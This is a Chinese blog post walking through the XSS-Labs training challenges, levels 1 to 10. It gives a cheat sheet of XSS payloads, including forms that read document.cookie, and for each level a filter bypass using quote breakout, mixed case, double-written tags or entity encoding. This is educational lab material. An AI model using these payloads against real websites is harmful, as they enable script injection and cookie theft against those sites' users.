侧边栏壁纸
博主头像

  • 累计撰写 12 篇文章
  • 累计创建 12 个标签
  • 累计收到 1 条评论

目 录CONTENT

文章目录

Xss_Labs

⠀
2022-03-14 / 0 评论 / 2 点赞 / 326 阅读 / 1,939 字 / 正在检测是否收录...

常用

<script>alert ('hello') </script>
<script>while(1){alert("xss");};</script> 一直循环注入的xss 
<script>onload=alert ('hello') </script> 当页面载入完毕后执行Javascript代码:
<a href='' onclick=alert("hello")>click</a> 当按钮被点击时执行Javascript代码
<img src=http://192.168.10.128/a.jpg onerror=alert('xss4')> 当视频的媒体数据加载期间发生错误时执行 JavaScript 
<script>alert(document.cookie)</script> 获取cookie
str_resplace过滤script
可以使用大小写 ,双写绕过
<Script>alert('hello')</Script>
组合过滤条件
<scr<script>ipt>alert('xss')</script>

Leve1

Get 请求
看源码是只要弹窗就会执行
使用最简单的语句

<script>alert(‘xss’)</script>

image.png

Level2

查看源代码
image.png
采用了过滤
以及html 实体
使用“> 闭合绕过的方法进行测试

"/><script>alert('xss')</script>

level3

源码

<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>"."<center>
<form action=level3.php method=GET>
<input name=keyword  value='".htmlspecialchars($str)."'> //对$str进行html编码
<input type=submit name=submit value=搜索 />
</form>
</center>";
?>

<>、&、被转义,单引号、/\未被被转义,
使用单引号绕过

 ‘ onclick=’alert(1)

以及

‘ autofocus  OnfOcus=alert(1) x=’

进行绕过

Level 4

和上一关差不多 ,采用双引号 进行 绕过

“ onclick=”alert(1)
“ autofocus  OnfOcus=alert(1) x=”

Level5

对on和<script进行替换为o_n和<scr_ipt
那就尝试 < a href>

对on和<script进行替换为o_n和<scr_ipt
那就尝试 < a  href>
“><a href=javascript:alert(1)> xss  </a
"><a href=”javascript:alert(document.cookie)”>

Level6

利用上一关代码
image.png

过滤了href 
使用大写绕过尝试
“> <a HrEf=javascript:alert(1)>xss</a”

Level7

image.png

直接把script 过滤掉了
双写 绕过
“/><scrscriptipt>alert(1)</scrscriptipt>

Level8

image.png
只输入

Javascript:alert(1)

image.png
可以生成链接尝试转换编码绕过
这里是 ri编码转换为 十六进制 绕过

javasc&#x72;&#x69;pt:alert(/xss/)

##转为Hex 值也可以进行绕过

level 9

必须条件是要一 http://
不然就返回错误

javasc&#x0072;ipt:%0dhttp:// %0dalert(1)

image.png

Level 10

修改类型
看一下
Hidden 是隐藏的意思
image.png

" type="text" onclick="alert(1)" x="
2

评论区